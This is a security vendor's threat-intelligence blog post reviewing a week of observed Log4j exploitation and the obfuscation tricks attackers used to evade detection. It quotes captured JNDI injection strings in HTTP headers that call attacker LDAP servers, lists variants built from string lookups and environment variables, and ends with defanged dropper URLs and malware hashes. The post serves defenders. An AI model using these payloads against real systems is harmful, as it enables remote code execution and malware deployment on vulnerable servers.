Log4j Attacks – A Week in Review
Key Takeaways
- Log4J Vulnerabilities (CVE-2021-44228, CVE-2021-45046) are being exploited by opportunistic attackers.
- Evasion techniques are being employed to subvert detection.
Overview
A week into the Log4J vulnerability that’s impacting just about every industry, there’s been patching, re-patching, and more adoption of this vulnerability by attackers. Lacework Labs has continued to closely monitor the situation and continues to see Mirai, Kinsing and Cryptocurrency miners be distributed as originally reported in this blog a week ago. While the first patch introduced potential for a DoS attack, Lacework Labs has not seen this employed to affect CVE-2021-45046. Over time, more of the initial JNDI strings have become obfuscated to attempt to subvert detection. An example of payloads Lacework Labs saw being used last weekend and then payloads being used today can be seen in the image above. This blog post will highlight some of the techniques Lacework Labs has identified.
Where to Put The Payload?
Given the ubiquitous usage of the Log4J library in enterprise and open source software this particular vulnerability has been difficult for organizations to identify every place where they might be vulnerable. For example, a web server not running any software that leverages Log4J may be hit with a payload that exploits CVE-2021-44228 and not be impacted. However, a log forwarder (ex: syslog) would pass on that particular server’s logs to a logging stack that may use Log4J thus causing the payload to be executed deeper within a network.
These delayed payload executions further intrigue attackers looking to move deeper into a network, but it also presents a question to the attacker of where to put the payload string. Lacework Labs has observed opportunistic attackers placing the JDNI exploitation string within numerous fields of an HTTP request including the User-Agent, refer header, etc. Interestingly enough in certain circumstances the same payload was used but with different string evasion techniques. Two examples of this can be seen below.
GET / x:%24%7Bjndi%3Aldap%3A%2F%2F142.44.203.85%3A1389%2FBasic%2FCommand%2FBase64%2F<REDACTED_PAYLOAD> referer:${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>} x-forwarded-for ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>} authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD>} user-agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://142.44.203.85:1389/Basic/Command/Base64/<REDACTED_PAYLOAD} |
Figure 1 – Payload Obfuscation
GET / HTTP/1.1 X-Api-Version: ${jndi:ldap://135.148.143.217:1389/<REDACTED_PAYLOAD>} User-Agent: ${jndi:ldap://135.148.143.217:1389/<REDACTED_PAYLOAD>} Referer: ${jndi:ldap://135.148.143.217:1389/<REDACTED_PAYLOAD>} host: <REDACTED> Connection: close\r\n\r\n |
Figure 2 – Payload Obfuscation 2
Delayed execution further lowers the bar for opportunistic attackers looking to deploy Cryptocurrency miners. Effectively after sending RCE payload which downloads and executes a bash script to deploy a Cryptocurreny miner, they only need to keep the initial bash script hosted and may have it spread throughout an environment through log forwarding.
Observed Technique – String Manipulation
Typically, the format of the exploit string is as follows:
${jndi:ldap//<attackers_ip_address>:<attacker_port>/path/to/resource} |
Figure 3 - Original PoC Exploit String
Lacework Labs has observed string concatenation to build various portions of the exploit string such as “ldap” as shown in the table below.
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://<REDACTED> |
Figure 4 - Payload string Modification 1
While this technique was reported in our original blog, it has further been adopted to include the “JNDI” portion of the string. Lacework Labs has identified the JNDI payload portion of the Log4J proof-of-concept exploits being stored in the User-Agent portion of HTTP requests.
User-Agent:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<REDACTED> |
Figure 5 - Payload string Modification 2
User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://<REDACTED> |
Figure 6 - Payload string Modification 3
These simple string manipulations highlight the need for verbose detections that are not simple static rules in order to be all encompassing of the variety of payloads attackers will continue to modify and adapt to the latest detection bypasses. Perhaps the most aggressive payload for evasion can be observed below where the JNDI, LDAP, and IP portion of the payload was obfuscated along with the Tomcat path being targeted.
User-Agent: ekausif/3.1 ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}} \r\nAccept: */*\r\n Bearer: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n Authentication: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n X-Requested-With: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n X-Requested-For: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n X-Api-Version: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n Referer: ${${::-j}${::-n}d${::-i}:${::-l}${::-d}${::-a}${::-p}://${::-1}${::-5}${::-9}.${::-2}${::-2}3.5.30:44${::-3}/${::-o}=${::-t}omca${::-t}}\r\n'" |
Figure 7 - Payload string Modification 4
Observed Technique – DNS Lookups
The ability to modify the JNDI exploit string to perform DNS lookups allows for individuals to test if a server is vulnerable to Log4J without executing an actual payload against the victim. Instead, a DNS request can be issued from the target machine to a particular DNS record. This can also be performed via “ldap” JNDI directive and our friends at Thinkist have a blog post on how to achieve this. Lacework Labs has identified this behavior for “scanning” for vulnerable and can be seen in the images below.
${jndi:ldap://x${hostName}.L4J.p5k9q4p8cdf6n8wv0fw73jqut.canarytokens.com/a |
Figure 8 - Canarytokens in JNDI String
user-agent:${${::-j}ndi:dns://45.83.64.1/securityscan-w6dvor7c5l4b6ztz |
Figure 9 - Payload string Modification for DNS
A further concerning usage of this technique was highlighted by security researcher Zander Work on how this particular technique could be used for sensitive environment variable/API theft. Lacework Labs has not seen that particular event within their honeypots, however the environment name manipulation technique was observed being adopted to then build “JNDI” strings.
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}// |
Figure 10 - Payload string Modification 4
Conclusion
Opportunistic attackers continue to leverage Log4J vulnerabilities for spreading a variety of bots (Kinsing, Mirai, Mushtik) and Cryptocurrency miners. The modification of the exploitation string demonstrates adversaries rapidly adapting to the research being published publicly. Having a verbose detection strategy against these payloads is critical to avoid a “whack-a-mole” situation with detecting specific strings.
Understanding where Log4J exists in your environment is no easy task, nor is mitigating the vulnerability. Given the dynamic nature of the situation, Lacework Labs recommends following official Log4J security advisory guidance as well as vendors security guidance for their software when making internal security decisions.
For more content like this flow us on Twitter and LinkedIn!
IoCs
Observed IPs Hosting Dropper Scripts/Binaries |
hxxp://135.125.217.87/jndi[.]sh |
hxxp://92.242.40.21/lh2[.]sh |
hxxp://82.118.18.201/lh[.]sh |
hxxp://80.71.158.44/lh[.]sh |
hxxp://194.40.243.149/lh[.]sh |
hxxp://62.210.130.250/lh[.]sh |
hxxp://152.67.63.150[/]py |
hxxp://155.94.154.170/aaa |
hxxp://185.191.32.198 |
hxxp://14.215.128.148 |
Filename |
SHA256 |
py |
af997593d2df937f8295976d99a2779b9b8fab58cf2b572651d4144c3ae030ea |
kinsing |
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b |
lh2.sh |
2fbc3b9421bc770831a724d9e467c7dbc220dc41c0ca21d33a45893be4ff82d4 |
pty3 |
a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce |
pty11 |
63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9 |
libsystem.so |
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a |
pty1 |
e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80 |
1sh |
b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0 |
log |
a290b6f956ecdb3d2d2019088f0b01a93a9f680c82a4680c0fb87eb5e3e64897 |
3sh |
5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28 |
pty2 |
715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7 |
stlalive.sh |
d050b27779d9090dcd3ca5bdae6343cfa3aac1b5cd55c032cb13fab26cbb06b8 |
static.c |
ef11c120fab2129fce6dddb8b007102ef98281e11864386ff09c179c58d1dfe0 |
stl.sh |
caf8f47fde4f20e134af0ee93dff4d70086ec4912e85a5dc5c09fbd6ae66b96b |
jndi.sh |
56353abdfd74916b32b114e4f0e310a9d1b197a803bb8e37fd43c7134cd53b6b |
lh.sh |
acf011a715b535dc75e3ae56fbf9622b3a8952f6eaf34dbd0e33fbb5c8bb35be |
pty4 |
c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799 |
ldm |
39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129 |
pty5 |
19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d |
pty10 |
6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b |
lh.sh |
3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 |
Copyright 2021 Lacework Inc. All rights reserved.